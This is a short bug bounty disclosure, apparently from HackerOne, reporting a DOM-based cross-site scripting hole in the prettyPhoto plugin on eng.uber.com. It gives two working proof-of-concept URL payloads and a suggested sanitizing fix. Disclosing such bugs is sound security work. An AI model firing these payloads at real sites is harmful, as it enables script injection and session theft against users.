Uber: Dom Based Xss

ID H1:125498
Type hackerone
Reporter e3xpl0it
Modified 2016-05-09T22:27:41


Hi. found dom xss on this subdomain eng.uber.com. you are using a vulnerable plugin prettyPhoto.. This XSS will work in Firefox,Chrome - Google and IE last version ! And this is very dangerous! POC Firefox vector http://eng.uber.com/#prettyPhoto[i]/x,<svg/onload=alert(document.domain)>/x POC Google and IE http://eng.uber.com/#prettyPhoto[gallery]/1,<a onclick="alert(document.domain);">/

Add screenshot How to fix the vulnerability,upgrade the plugin or add the filter hashIndex = parseInt(hashIndex) hashRel = hashRel.replace(/([ #;&,.+*~\':"!^$=>|\/])/g,'\$1');